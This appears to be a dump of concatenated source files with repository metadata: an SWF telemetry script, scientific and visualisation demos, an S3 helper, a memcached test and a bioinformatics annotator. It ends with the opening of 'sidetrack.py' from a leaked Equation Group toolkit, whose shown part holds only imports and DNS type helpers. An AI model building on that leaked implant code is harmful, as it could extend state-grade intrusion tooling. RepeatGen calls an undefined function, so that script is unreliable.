POSSIBILITY OF SUCH DAMAGE. '''See readme or run with no args for usage''' import os import sys import tempfile import shutil import struct import zlib import hashlib import inspect supportsLZMA = False try: import pylzma supportsLZMA = True except: pass #################################### # Helpers #################################### class stringFile(object): def __init__(self, data): self.data = data def read(self, num=-1): result = self.data[:num] self.data = self.data[num:] return result def close(self): self.data = None def flush(self): pass def consumeSwfTag(f): tagBytes = "" recordHeaderRaw = f.read(2) tagBytes += recordHeaderRaw if recordHeaderRaw == "": raise Exception("Bad SWF: Unexpected end of file") recordHeader = struct.unpack("BB", recordHeaderRaw) tagCode = ((recordHeader[1] & 0xff) << 8) | (recordHeader[0] & 0xff) tagType = (tagCode >> 6) tagLength = tagCode & 0x3f if tagLength == 0x3f: ll = f.read(4) longlength = struct.unpack("BBBB", ll) tagLength = ((longlength[3]&0xff) << 24) | ((longlength[2]&0xff) << 16) | ((longlength[1]&0xff) << 8) | (longlength[0]&0xff) tagBytes += ll tagBytes += f.read(tagLength) return (tagType, tagBytes) def outputInt(o, i): o.write(struct.pack('I', i)) def outputTelemetryTag(o, passwordClear): lengthBytes = 2 # reserve if passwordClear: sha = hashlib.sha256() sha.update(passwordClear) passwordDigest = sha.digest() lengthBytes += len(passwordDigest) # Record header code = 93 if lengthBytes >= 63: o.write(struct.pack('<HI', code << 6 | 0x3f, lengthBytes)) else: o.write(struct.pack('<H', code << 6 | lengthBytes)) # Reserve o.write(struct.pack('<H', 0)) # Password if passwordClear: o.write(passwordDigest) #################################### # main() #################################### if __name__ == "__main__": #################################### # Parse command line #################################### if len(sys.argv) < 2: print("Usage: %s SWF_FILE [PASSWORD]" % os.path.basename(inspect.getfile(inspect.currentframe()))) print("\nIf PASSWORD is provided, then a password will be required to view advanced telemetry in Adobe 'Monocle'.") sys.exit(-1) infile = sys.argv[1] passwordClear = sys.argv[2] if len(sys.argv) >= 3 else None #################################### # Process SWF header #################################### swfFH = open(infile, 'rb') signature = swfFH.read(3) swfVersion = swfFH.read(1) struct.unpack("<I", swfFH.read(4))[0] # uncompressed length of file if signature == "FWS": pass elif signature == "CWS": decompressedFH = stringFile(zlib.decompressobj().decompress(swfFH.read())) swfFH.close() swfFH = decompressedFH elif signature == "ZWS": if not supportsLZMA: raise Exception("You need the PyLZMA package to use this script on \ LZMA-compressed SWFs. http://www.joachim-bauch.de/projects/pylzma/") swfFH.read(4) # compressed length decompressedFH = stringFile(pylzma.decompress(swfFH.read())) swfFH.close() swfFH = decompressedFH else: raise Exception("Bad SWF: Unrecognized signature: %s" % signature) f = swfFH o = tempfile.TemporaryFile() o.write(signature) o.write(swfVersion) outputInt(o, 0) # FileLength - we'll fix this up later # FrameSize - this is nasty to read because its size can vary rs = f.read(1) r = struct.unpack("B", rs) rbits = (r[0] & 0xff) >> 3 rrbytes = (7 + (rbits*4) - 3) / 8; o.write(rs) o.write(f.read((int)(rrbytes))) o.write(f.read(4)) # FrameRate and FrameCount #################################### # Process each SWF tag #################################### while True: (tagType, tagBytes) = consumeSwfTag(f) if tagType == 93: raise Exception("Bad SWF: already has EnableTelemetry tag") elif tagType == 92: raise Exception("Bad SWF: Signed SWFs are not supported") elif tagType == 69: # FileAttributes tag o.write(tagBytes) # Look ahead for Metadata tag. If present, put our tag after it (nextTagType, nextTagBytes) = consumeSwfTag(f) writeAfterNextTag = nextTagType == 77 if writeAfterNextTag: o.write(nextTagBytes) outputTelemetryTag(o, passwordClear) # If there was no Metadata tag, we still need to write that tag out if not writeAfterNextTag: o.write(nextTagBytes) (tagType, tagBytes) = consumeSwfTag(f) o.write(tagBytes) if tagType == 0: break #################################### # Finish up #################################### # Fix the FileLength header uncompressedLength = o.tell() o.seek(4) o.write(struct.pack("I", uncompressedLength)) o.flush() o.seek(0) # Copy the temp file to the outFile, compressing if necessary outFile = open(infile, "wb") if signature == "FWS": shutil.copyfileobj(o, outFile) else: outFile.write(o.read(8)) # File is compressed after header if signature == "CWS": outFile.write(zlib.compress(o.read())) elif signature == "ZWS": compressed = pylzma.compress(o.read()) outputInt(outFile, len(compressed)-5) # LZMA SWF has CompressedLength header field outFile.write(compressed) else: assert(false) outFile.close() if passwordClear: print("Added opt-in flag with encrypted password " + passwordClear) else: print("Added opt-in flag with no password")
gpl-3.0
1,561,226,999,871,632,100
30.941667
132
0.594834
false
aguirrea/lucy
tests/testBalieroWalk.py
1
2371
#! /usr/bin/env python # -*- coding: utf-8 -*- # Andrés Aguirre Dorelo # MINA/INCO/UDELAR # # Execution of individuals resulted from the Baliero and Pias work # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import glob import os import sys import time from configuration.LoadSystemConfiguration import LoadSystemConfiguration from datatypes.DTIndividualGeneticMaterial import DTIndividualGeneticTimeSerieFile, DTIndividualGeneticMatrix from datatypes.DTIndividualProperty import DTIndividualPropertyBaliero, DTIndividualPropertyPhysicalBioloid from Individual import Individual balieroProp = DTIndividualPropertyBaliero() physicalProp = DTIndividualPropertyPhysicalBioloid() conf = LoadSystemConfiguration() BalieroDir = os.getcwd()+conf.getDirectory("Baliero transformed walk Files") arguments = len(sys.argv) def createIndividual(filename): if int(conf.getProperty("Lucy simulated?"))==1: walk = Individual(balieroProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename)) else: walk = Individual(physicalProp, DTIndividualGeneticTimeSerieFile(os.getcwd()+"/"+filename)) return walk walk = Individual(balieroProp, DTIndividualGeneticMatrix()) #dummy individual to initialise the simulator and enable the time step configuration walk.execute() print "please set the proper time step in vrep" time.sleep(5) if arguments > 1: files = sys.argv[1:] for filename in files: print 'executing individual: ' + filename walk = createIndividual(filename) walk.execute() else: for filename in glob.glob(os.path.join(BalieroDir, '*.xml')): print 'executing individual: ' + filename walk = createIndividual(filename) walk.execute()
gpl-3.0
1,704,087,821,725,901,800
36.03125
144
0.745992
false
nikolaichik/SigmoID
Python/RepeatGen.py
1
23652
import sys import argparse from time import process_time import Bio from Bio.SeqFeature import FeatureLocation from Bio.SeqFeature import SeqFeature from decimal import * class MySeqFeature(SeqFeature): def __str__(self): out = "type: %s\n" % self.type if self.strand == 1: out += "location: [%s:%s](%s)\n" % (self.location.start+1, self.location.end, '+') if self.strand == -1: out += "location: [%s:%s](%s)\n" % (self.location.start+1, self.location.end, '-') if self.id and self.id != "<unknown id>": out += "id: %s\n" % self.id out += "qualifiers:\n" for qual_key in sorted(self.qualifiers): out += " Key: %s, Value: %s\n" % (qual_key, self.qualifiers[qual_key]) if Bio.__version__ != '1.68': # to avoid problems with diff biopython versions if not hasattr(self, "_sub_features"): self._sub_features = [] if len(self._sub_features) != 0: out += "Sub-Features\n" for sub_feature in self._sub_features: out += "%s\n" % sub_feature return out def is_within_feature(list_of_features, index, some_hit): # 'index' is for feature's index within 'list_of_features' if (list_of_features[index].location.start < some_hit.location.start < list_of_features[index].location.end or list_of_features[index].location.start < some_hit.location.end < list_of_features[index].location.end) or \ (list_of_features[index].location.start < some_hit.location.start < some_hit.location.end < list_of_features[index+1].location.start and \ list_of_features[index].strand == +1 and \ list_of_features[index].strand != list_of_features[index+1].strand): # checking if hit is within other features or is between two convergent ones. return True else: return False def is_within_boundary(list_of_features, index, some_hit): for feature in list_of_features[index:]: if (feature.location.start - list_of_features[index].location.end) < (enter.boundary+1): if (list_of_features[index].location.start+enter.boundary > \ some_hit.location.end > \ list_of_features[index].location.start and \ list_of_features[index].strand == +1) or \ (list_of_features[index].location.end-enter.boundary < \ some_hit.location.start < \ list_of_features[index].location.end and \ list_of_features[index].strand == -1): return True else: return False else: return False def qualifiers_function(qualifiers, var): qual_var = [] for some_qualifier in qualifiers: if any(symbol == '#' for symbol in some_qualifier): qual_var.append(some_qualifier.split('#')) else: sys.exit('Please check your general qualifiers typing') for number in range(len(qual_var)): value_list = [] for index in range(len(qual_var)): if qual_var[number][0] == qual_var[index][0] and \ qual_var[index][1] not in value_list: value_list.append(qual_var[index][1]) var[qual_var[number][0]] = value_list return var def nhmm_parser(path_to_file, max_model_length): x = [] try: a = open(path_to_file, 'r') except IOError: sys.exit('Open error! Please check your nhmmer report input file!') r = a.readlines() b = [] d = [] e = [] for index in range(len(r)): d.append([]) if not r[index].startswith('#') or r[index].startswith('\n'): item = r[index].split(' ') if len(item) >= 2: for part in item: if part != '' and len(part) != 0: part = part.replace('\n', '') d[index].append(part) for index in range(len(d)): if len(d[index]) != 0: b.append(d[index]) for index in range(len(b)): if len(b[index]) <= 10: for number in range(len(b[index])): b[index+1].insert(number, b[index][number]) for index in range(len(b)): if len(b[index]) > 10: e.append(b[index]) for item in e: for num_of_spaces in range(len(e[0])): # to avoid problems with additional spaces... e[0] - firstly \ # splitted string by ' ' try: x.append([item[8+num_of_spaces], item[9+num_of_spaces], int(item[11+num_of_spaces]+'1'), float(item[12+num_of_spaces]), float(item[13+num_of_spaces]), item[0+num_of_spaces], item[1+num_of_spaces], int(item[4+num_of_spaces]), int(item[5+num_of_spaces]), int(item[6+num_of_spaces]), int(item[7+num_of_spaces]) ]) if max_model_length is False: max_model_length = int(item[5+num_of_spaces]) elif max_model_length is not False and \ int(item[5+num_of_spaces]) > max_model_length: max_model_length = int(item[5+num_of_spaces]) else: pass except ValueError: pass else: break return [x, max_model_length] def nhmm_prog(path_to_file, e): a = open(path_to_file, 'r') r = a.readlines() prog_list = [] for prog_line in r: if prog_line.startswith('# Program:') or \ prog_line.startswith('# Version:'): prog_list.append(prog_line) prog_list = [item.split(' ') for item in prog_list] for item in prog_list: for piece in item: if piece != '': e.append(piece) return def sorting_output_features(lst): bit_score_list = [] for some_feature in lst: for key in some_feature.qualifiers.keys(): if key == 'note': temp = some_feature.qualifiers[key] temp = temp.split(' ') bit_score_list.append(float(temp[-3])) return bit_score_list def score_parser(some_feature): for key in some_feature.qualifiers.keys(): if key == 'note' and type(some_feature.qualifiers['note']) != list: temp = some_feature.qualifiers[key] temp = temp.split(' ') bit_score = float(temp[-3]) return bit_score elif key == 'note' and type(some_feature.qualifiers['note']) == list: for note in some_feature.qualifiers['note']: if note.startswith('nhmmer'): temp = note temp = temp.split(' ') bit_score = float(temp[-3]) return bit_score def output(score_list, output_features): for val in score_list: for some_feature in output_features: if val == feature_score(some_feature): print (some_feature) output_features = [f for f in output_features if f != some_feature] def feature_score(some_feature): for key in some_feature.qualifiers.keys(): if key == 'note' and type(some_feature.qualifiers[key]) != []: temp = some_feature.qualifiers[key] temp = temp.split(' ') return float(temp[-3]) def dna_topology(path, topo_list): # This function deals with with DNA topology problem in biopython # for more detail: https://github.com/biopython/biopython/issues/363 infile = open(path, 'r') loci_counter = -1 # because 1 is 0 in python lines = infile.readlines() for numline in range(len(lines)): if lines[numline].startswith('LOCUS'): loci_counter += 1 lines[numline] = topo_list[loci_counter] infile.close() return lines def createparser(): parser = argparse.ArgumentParser( prog='RepeatGen', usage='\n%(prog)s <report_file> <input_file> <output_file> [options]', description='''This script allows to add features to a genbank \ file according to nhmmer results.\ Requires Biopython 1.64 (or newer)''', epilog='(c) Aliaksandr Damienikan, 2018.') parser.add_argument('report_file', help='path to nhmmer report file produced with \ -tblout option.') parser.add_argument('input_file', help='path to input Genbank file.') parser.add_argument('output_file', help='path to output Genbank file.') parser.add_argument('-L', '--length', default=False, help='annotate features of specified length (range of lengths).', metavar='<int>/<int:int>', required=False, type=str) parser.add_argument('-q', '--qual', default='', metavar='<key#"value">', nargs='*', dest='qual', help='''add this qualifier to each annotated \ feature.''') parser.add_argument('-p', '--palindromic', action='store_const', const=True, default=False, help='''filter palindromic repeats.''') parser.add_argument('-E', '--eval', default=False, type=float, metavar='<float or integer>', help='''threshold E-Value.''') parser.add_argument('-S', '--score', default=False, type=float, metavar='<float or integer>', help='''threshold Bit Score.''') parser.add_argument('-c', '--coverage', default=0.5, type=float, metavar='<float>', help='''minimal coverage for input model (default is 0.5)''') parser.add_argument('-i', '--insert', action='store_const', const=True, default=False, help='''don't add features inside CDS.''') parser.add_argument('-a', '--alilen', type=int, default=False, metavar='<integer>', help='''set profile alignment length (the largest hmm_to if not specified).''') parser.add_argument('-b', '--boundary', type=int, default=0, metavar='<integer>', help='''set allowed length boundary for hits being within features.''') parser.add_argument('-d', '--duplicate', action='store_const', const=True, default=False, help='''no duplicate features with the same location \ and the same rpt_family qualifier value.''') parser.add_argument('-v', '--version', action='version', version='%(prog)s 1.3 (April 6, 2021)') parser.add_argument('-f', '--feature', metavar='<"feature key">', default='unknown type', help='''feature key to add (promoter, protein_bind \ etc.)''') return parser t_start = process_time() args = createparser() enter = args.parse_args() arguments = sys.argv[1:0] max_eval = enter.eval if enter.length is not False: enter.length = enter.length.split(':') if len(enter.length) == 1: enter.min_length = False enter.max_length = int(enter.length[0]) else: enter.min_length = int(enter.length[0]) enter.max_length = int(enter.length[1]) if not 0 <= enter.coverage <= 1: sys.exit('Coverage value is invalid, please specify values in 0.0-1.0 range') try: from Bio import SeqIO except ImportError: sys.exit('\nYou have no Biopython module installed!\n\ You can download it here for free: \ http://biopython.org/wiki/Download\n') try: input_handle = open(enter.input_file, 'r') except IOError: sys.exit('Open error! Please check your genbank input file!') circular_vs_linear = [] for line in input_handle.readlines(): if line.startswith('LOCUS'): circular_vs_linear.append(line) input_handle.close() input_handle = open(enter.input_file, 'r') if enter.input_file == enter.output_file: sys.exit('Sorry, but we can\'t edit input file. Plese give another name \ to output file!') try: output_handle = open(enter.output_file, 'w') except IOError: sys.exit('Open error! Please check your genbank output path!') print ('\nRepeatGen 1.0 (January 6, 2018)') print ("="*50) print ('Options used:\n') for arg in range(1, len(sys.argv)): print (sys.argv[arg]) file_path = enter.report_file qualifier = {'CHECK': 'CHECKED!'} qualifiers_function(enter.qual, qualifier) prog = [] maxlen = 0 parser_result = nhmm_parser(file_path, maxlen) allign_list = parser_result[0] if enter.alilen is False: model_length = parser_result[1] # if allignment length is not specified, maximal observed hmm_to is used else: model_length = enter.alilen nhmm_prog(file_path, prog) prog[2] = prog[2].replace('\r', '') records = SeqIO.parse(input_handle, 'genbank') allowed_types = ['CDS', 'ncRNA', 'sRNA', 'tRNA', 'misc_RNA'] total = 0 for record in records: print ('\n' + "-"*50 + "\nCONTIG: " + record.id) print ('\n FEATURES ADDED: \n') allowed_features_list = [] for feature in record.features: if feature.type in allowed_types: allowed_features_list.append(feature) try: cds_loc_start = allowed_features_list[0] except: cds_loc_start = record.features[0] try: cds_loc_end = allowed_features_list[-1] except: cds_loc_end = record.features[-1] for allign in allign_list: from Bio import SeqFeature if allign[2] == +1: env_start = int(allign[0]) #env_from env_end = int(allign[1]) #env_to strnd = int(allign[2]) e_value = float(allign[3]) score = allign[4] locus = allign[5] version = allign[6] hmm_from = allign[7] hmm_to = allign[8] hmm_diff = hmm_to - hmm_from getcontext().prec = 4 hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length) ali_start = allign[9] ali_end = allign[10] ali_diff = ali_end - ali_start else: env_start = int(allign[1]) #env_to env_end = int(allign[0]) #env_from strnd = int(allign[2]) e_value = float(allign[3]) score = allign[4] locus = allign[5] version = allign[6] hmm_from = allign[7] hmm_to = allign[8] hmm_diff = hmm_to - hmm_from getcontext().prec = 4 hmm_coverage = Decimal((hmm_diff+1))/Decimal(model_length) ali_start = allign[10] ali_end = allign[9] ali_diff = ali_end - ali_start start_pos = SeqFeature.ExactPosition(env_start-1) end_pos = SeqFeature.ExactPosition(env_end) feature_length = env_end - (env_start-1) feature_location = FeatureLocation(start_pos, end_pos) feature_type = enter.feature from Bio.SeqFeature import SeqFeature note_qualifier = dict() note_qualifier['note'] = str('%s score %s E-value %s' % (prog[2].replace('\n', ''), score, e_value)) my_feature = MySeqFeature( location=feature_location, type=feature_type, strand=strnd, qualifiers=dict(list(qualifier.items()) + list(note_qualifier.items()))) if Decimal(hmm_coverage) >= Decimal(enter.coverage) and \ ( (enter.min_length != 0 and enter.min_length <= feature_length <= enter.max_length) or \ (enter.min_length == False and feature_length == enter.max_length) \ ) and \ (score >= enter.score or enter.score is False): for i in reversed(range(len(record.features))): if record.features[i].location.start < \ my_feature.location.start and \ (enter.eval is False or e_value <= enter.eval or enter.score is not False): for c in range(len(allowed_features_list)-1): if allowed_features_list[c].location.start <= \ my_feature.location.start <= \ allowed_features_list[c+1].location.start: record.features.insert(i+1, my_feature) break break if i == 0 and \ record.features[i].location.start > \ my_feature.location.start: record.features.insert(i, my_feature) break if i == len(record.features)-1 and \ record.features[i].location.start < \ my_feature.location.start: record.features.insert(i+1, my_feature) break repeats = [] for feature in record.features: if 'rpt_family' in feature.qualifiers.keys(): if (feature.qualifiers['rpt_family'] == qualifier['rpt_family'] and \ enter.duplicate is True) or enter.duplicate is False: repeats.append([feature, record.features.index(feature)]) if enter.insert: hit_list = [] for i in range(len(record.features)): if 'CHECK' in record.features[i].qualifiers.keys(): hit_list.append(record.features[i]) for i in reversed(range(len(hit_list))): i = len(hit_list)-1-i for n in range(len(allowed_features_list)-1): if ( is_within_feature(allowed_features_list, n, hit_list[i]) and \ not is_within_boundary(allowed_features_list, n, hit_list[i]) ) or \ wrong_promoter_strand(allowed_features_list[n], hit_list[i], allowed_features_list[n+1]): hit_list.pop(i) break for i in reversed(range(len(record.features))): if 'CHECK' in record.features[i].qualifiers.keys() and \ not any(record.features[i] == hit for hit in hit_list): record.features.pop(i) if enter.palindromic: del_counter = 0 deleted = [] for feature in repeats: if feature not in deleted: for n in range(repeats.index(feature)+1, len(repeats)): further = repeats[n][0] if further.location.strand != feature[0].location.strand and \ 0 <= (further.location.start-feature[0].location.start) <= 2 and \ 0 <= (further.location.end-feature[0].location.end) <= 2 and \ 'CHECK' in record.features[feature[1]-del_counter].qualifiers.keys(): del record.features[feature[1]-del_counter] del_counter += 1 deleted.append(feature) elif enter.duplicate is True: if further.location.strand != feature[0].location.strand and \ 0 <= (further.location.start-feature[0].location.start) <= 2 and \ 0 <= (further.location.end-feature[0].location.end) <= 2 and \ 'CHECK' not in record.features[feature[1]-del_counter].qualifiers.keys() and \ 'CHECK' in record.features[repeats[n][1]-del_counter].qualifiers.keys(): del record.features[repeats[n][1]-del_counter] del_counter += 1 deleted.append(further) if enter.duplicate is True and \ 'rpt_family' in qualifier.keys(): repeats = [] del_counter = 0 for feature in record.features: if 'rpt_family' in feature.qualifiers.keys(): if feature.qualifiers['rpt_family'] == qualifier['rpt_family']: repeats.append([feature, record.features.index(feature)]) for repeat in repeats: for n in range(repeats.index(repeat)+1, len(repeats)): further_repeat = repeats[n][0] if 0 <= (further_repeat.location.start - repeat[0].location.start) <= 2 and \ 0 <= (further_repeat.location.end - repeat[0].location.end) <= 2 and \ repeat[0].qualifiers['rpt_family'] == further_repeat.qualifiers['rpt_family']: if score_parser(repeat[0]) >= \ score_parser(further_repeat): del record.features[repeat[1]-del_counter] elif score_parser(repeat[0]) < \ score_parser(further_repeat): del record.features[repeats[n][0]-del_counter] del_counter += 1 break output_features = [] for feature in record.features: if 'CHECK' in feature.qualifiers.keys(): del feature.qualifiers['CHECK'] output_features.append(feature) score_list = sorting_output_features(output_features) score_list.sort() output(score_list, output_features) print ('\nFeatures added:', len(output_features)) print ('\n' + "-"*50) SeqIO.write(record, output_handle, 'genbank') total += int(len(output_features)) output_handle.close() newlines = dna_topology(enter.output_file, circular_vs_linear) new_output_file = open(enter.output_file, 'w') new_output_file.writelines(newlines) new_output_file.close() input_handle.close() t_end = process_time() print ('Total features: ', total) print ('CPU time: {0:.3f} sec'.format(t_end-t_start)) print ('\n' + "="*50)
gpl-3.0
-6,934,267,850,099,133,000
41.085409
109
0.50723
false
lorensen/VTKExamples
src/Python/VisualizationAlgorithms/Cutter.py
1
1710
#!/usr/bin/env python # A simple script to demonstrate the vtkCutter function import vtk def main(): colors = vtk.vtkNamedColors() # Create a cube cube = vtk.vtkCubeSource() cube.SetXLength(40) cube.SetYLength(30) cube.SetZLength(20) cubeMapper = vtk.vtkPolyDataMapper() cubeMapper.SetInputConnection(cube.GetOutputPort()) # create a plane to cut,here it cuts in the XZ direction (xz normal=(1,0,0);XY =(0,0,1),YZ =(0,1,0) plane = vtk.vtkPlane() plane.SetOrigin(10, 0, 0) plane.SetNormal(1, 0, 0) # create cutter cutter = vtk.vtkCutter() cutter.SetCutFunction(plane) cutter.SetInputConnection(cube.GetOutputPort()) cutter.Update() cutterMapper = vtk.vtkPolyDataMapper() cutterMapper.SetInputConnection(cutter.GetOutputPort()) # create plane actor planeActor = vtk.vtkActor() planeActor.GetProperty().SetColor(colors.GetColor3d("Yellow")) planeActor.GetProperty().SetLineWidth(2) planeActor.SetMapper(cutterMapper) # create cube actor cubeActor = vtk.vtkActor() cubeActor.GetProperty().SetColor(colors.GetColor3d("Aquamarine")) cubeActor.GetProperty().SetOpacity(0.3) cubeActor.SetMapper(cubeMapper) # create renderers and add actors of plane and cube ren = vtk.vtkRenderer() ren.AddActor(planeActor) ren.AddActor(cubeActor) # Add renderer to renderwindow and render renWin = vtk.vtkRenderWindow() renWin.AddRenderer(ren) renWin.SetSize(600, 600) iren = vtk.vtkRenderWindowInteractor() iren.SetRenderWindow(renWin) ren.SetBackground(colors.GetColor3d("Silver")) renWin.Render() iren.Start() if __name__ == '__main__': main()
apache-2.0
636,900,238,253,238,100
26.580645
103
0.693567
false
ngsxfem/ngsxfem
demos/fictdom_mlset.py
1
4537
""" In this example we solve an unfitted Poisson problem similar to the one in `fictdom.py`, however this time with the unfitted geometry being the unit square. This example shall illustrate the functionality of ngsxfem to solve PDE problems on geometries described via multiple level set functions. PDE problem + Discretisation + Geometry + Implementation aspects: ----------------------------------------------------------------- * As in fictdom.py except for the different geometry and its handling. Used Features: -------------- * Quadrature with respect to multiple level set functions., see the 'mlset_pde' jupyter tutorial. * MultiLevelsetCutInfo, see the 'mlset_basic' jupyter tutorial. * DomainTypeArray convenience layer, see the 'mlset_basic' jupyter tutorial. * Restricted BilinearForm, jupyter tutorial `basics`. * Cut Differential Symbols, jupyter tutorials `intlset` and `cutfem`. """ # ------------------------------ LOAD LIBRARIES ------------------------------- from netgen.geom2d import SplineGeometry from ngsolve import * from xfem import * from xfem.mlset import * ngsglobals.msg_level = 2 # -------------------------------- PARAMETERS --------------------------------- # Domain corners ll, ur = (-0.2, -0.2), (1.2, 1.2) # Initial mesh diameter initial_maxh = 0.4 # Number of mesh bisections nref = 3 # Order of finite element space k = 1 # Stabilization parameter for ghost-penalty gamma_s = 0.5 # Stabilization parameter for Nitsche gamma_n = 10 # ----------------------------------- MAIN ------------------------------------ # Set up the level sets, exact solution and right-hand side def level_sets(): return [-y, x - 1, y - 1, -x] nr_ls = len(level_sets()) u_ex = 16 * x * (1 - x) * y * (1 - y) grad_u_ex = (u_ex.Diff(x).Compile(), u_ex.Diff(y).Compile()) rhs = -(u_ex.Diff(x).Diff(x) + u_ex.Diff(y).Diff(y)).Compile() # Geometry and mesh geo = SplineGeometry() geo.AddRectangle(ll, ur, bcs=("bottom", "right", "top", "left")) ngmesh = geo.GenerateMesh(maxh=initial_maxh) for i in range(nref): ngmesh.Refine() mesh = Mesh(ngmesh) # Level set and cut-information P1 = H1(mesh, order=1) lsetsp1 = tuple(GridFunction(P1) for i in range(nr_ls)) for i, lsetp1 in enumerate(lsetsp1): InterpolateToP1(level_sets()[i], lsetp1) Draw(lsetp1, mesh, "lsetp1_{}".format(i)) square = DomainTypeArray((NEG, NEG, NEG, NEG)) with TaskManager(): square.Compress(lsetsp1) boundary = square.Boundary() boundary.Compress(lsetsp1) mlci = MultiLevelsetCutInfo(mesh, lsetsp1) # Element and degrees-of-freedom markers els_if_singe = {dtt: BitArray(mesh.ne) for dtt in boundary} facets_gp = BitArray(mesh.nedge) hasneg = mlci.GetElementsWithContribution(square) # Finite element space Vhbase = H1(mesh, order=k, dgjumps=True) Vh = Restrict(Vhbase, hasneg) gfu = GridFunction(Vh) hasif = mlci.GetElementsWithContribution(boundary) Draw(BitArrayCF(hasif), mesh, "hasif") for i, (dtt, els_bnd) in enumerate(els_if_singe.items()): els_bnd[:] = mlci.GetElementsWithContribution(dtt) Draw(BitArrayCF(els_bnd), mesh, "els_if_singe" + str(i)) facets_gp = GetFacetsWithNeighborTypes(mesh, a=hasneg, b=hasif, use_and=True) els_gp = GetElementsWithNeighborFacets(mesh, facets_gp) Draw(BitArrayCF(els_gp), mesh, "gp_elements") # Bilinear and linear forms of the weak formulation u, v = Vh.TnT() h = specialcf.mesh_size normals = square.GetOuterNormals(lsetsp1) # Set up the integrator symbols dx = dCut(lsetsp1, square, definedonelements=hasneg) ds = {dtt: dCut(lsetsp1, dtt, definedonelements=els_if_singe[dtt]) for dtt in boundary} dw = dFacetPatch(definedonelements=facets_gp) # Construct integrator a = RestrictedBilinearForm(Vh, facet_restriction=facets_gp, check_unused=False) a += InnerProduct(grad(u), grad(v)) * dx for bnd, n in normals.items(): a += -InnerProduct(grad(u) * n, v) * ds[bnd] a += -InnerProduct(grad(v) * n, u) * ds[bnd] a += (gamma_n * k * k / h) * InnerProduct(u, v) * ds[bnd] a += gamma_s / (h**2) * (u - u.Other()) * (v - v.Other()) * dw f = LinearForm(Vh) f += rhs * v * dx # Assemble and solve the linear system f.Assemble() a.Assemble() gfu.vec.data = a.mat.Inverse(Vh.FreeDofs()) * f.vec Draw(gfu, mesh, "uh") # Post-processing err_l2 = sqrt(Integrate((gfu - u_ex)**2 * dx.order(2 * k), mesh)) err_h1 = sqrt(Integrate((Grad(gfu) - grad_u_ex)**2 * dx.order(2 * (k - 1)), mesh)) print("L2 error = {:1.5e}".format(err_l2), "H1 error = {:1.5e}".format(err_h1))
lgpl-3.0
2,544,864,473,202,585,000
29.655405
79
0.648446
false
selassid/canopener
canopener/s3file.py
1
1324
# -*- coding: utf-8 -*- from __future__ import absolute_import from __future__ import unicode_literals try: from urllib.parse import urlparse except ImportError: from urlparse import urlparse import tempfile from boto.s3.connection import S3Connection def make_s3_connection(aws_access_key_id=None, aws_secret_access_key=None): """Mockable point for creating S3Connections.""" return S3Connection( aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, ) class s3file(object): def __new__( cls, filename, mode='r', aws_access_key_id=None, aws_secret_access_key=None, ): """Opens a local copy of an S3 URL.""" parse = urlparse(filename) if 'w' in mode: raise ValueError("can't write to S3") if parse.scheme != 's3': raise ValueError("s3file can't open non-S3 URLs") conn = make_s3_connection( aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, ) bucket = conn.get_bucket(parse.netloc) key = bucket.get_key(parse.path) local_file = tempfile.TemporaryFile() key.get_contents_to_file(local_file) local_file.seek(0) return local_file
bsd-2-clause
-4,765,795,732,312,073,000
26.583333
75
0.616314
false
hankshz/dockers
memcached/script/test-memcached.py
1
1304
#!/usr/bin/env python3 import time from pymemcache.client.base import Client master = Client(('memcached-master', 11211)) slave1 = Client(('memcached-slave1', 11211)) slave2 = Client(('memcached-slave2', 11211)) slave3 = Client(('memcached-slave3', 11211)) # Invalidate all # mcrouter seems not work properly with pymemcache flush_all slave1.flush_all() slave2.flush_all() slave3.flush_all() # Set & Get from the master master.set('a', '1') assert(master.get('a') == b'1') master.set('b', '2') assert(master.get('b') == b'2') master.set('c', '3') assert(master.get('c') == b'3') master.set('d', '4') assert(master.get('d') == b'4') # Get from the slave1, only string starts with 'a' slave1 = Client(('memcached-slave1', 11211)) assert(slave1.get('a') == b'1') assert(slave1.get('b') == None) assert(slave1.get('c') == None) assert(slave1.get('d') == None) # Get from the slave2, only string starts with 'b' slave2 = Client(('memcached-slave2', 11211)) assert(slave2.get('a') == None) assert(slave2.get('b') == b'2') assert(slave2.get('c') == None) assert(slave2.get('d') == None) # Get from the slave3, only rest of strings slave3 = Client(('memcached-slave3', 11211)) assert(slave3.get('a') == None) assert(slave3.get('b') == None) assert(slave3.get('c') == b'3') assert(slave3.get('d') == b'4')
apache-2.0
-5,473,104,553,618,401,000
27.347826
60
0.663344
false
DarthMaulware/EquationGroupLeaks
Leak #4 - Don't Forget Your Base/EQGRP-Auction-File/Linux/bin/pyside/sidetrack.py
1
72163
import base import crypto import echocmd import string import struct import time import re import os import sys from socket import * import rawtcp import types class SIDECMD(echocmd.ECHOCMD): def __init__(self): echocmd.ECHOCMD.__init__(self) def TypeConvert(self, stype): #print "In TypeConvert %d" % (stype) if type(stype) != type(''): if stype == 1: stype = "A" elif stype == 2: stype = "NS" elif stype == 3: stype = "MD" elif stype == 4: stype = "MF" elif stype == 5: stype = "CNAME" elif stype == 6: stype = "SOA" elif stype == 7: stype = "MB" elif stype == 8: stype = "MG" elif stype == 9: stype = "MR" elif stype == 10: stype = "NULL" elif stype == 11: stype = "WKS" elif stype == 12: stype = "PTR" elif stype == 13: stype = "HINFO" elif stype == 14: stype = "MINFO" elif stype == 15: stype = "MX" elif stype == 16: stype = "TXT" elif stype == 252: stype = "AXFR" elif stype == 253: stype = "MAILB" elif stype == 254: stype = "MAILA" elif stype == 255: stype = "*" return stype def ConvertType(self, rtype): if type(rtype) != type(0): rtype = string.upper(rtype) if rtype == "A": rtype = 1 elif rtype == "NS": rtype = 2 elif rtype == "MD": rtype = 3 elif rtype == "MF": rtype = 4 elif rtype == "CNAME": rtype = 5 elif rtype == "SOA": rtype = 6 elif rtype == "MB": rtype = 7 elif rtype == "MG": rtype = 8 elif rtype == "MR": rtype = 9 elif rtype == "NULL": rtype = 10 elif rtype == "WKS": rtype = 11 elif rtype == "PTR": rtype = 12 elif rtype == "HINFO": rtype = 13 elif rtype == 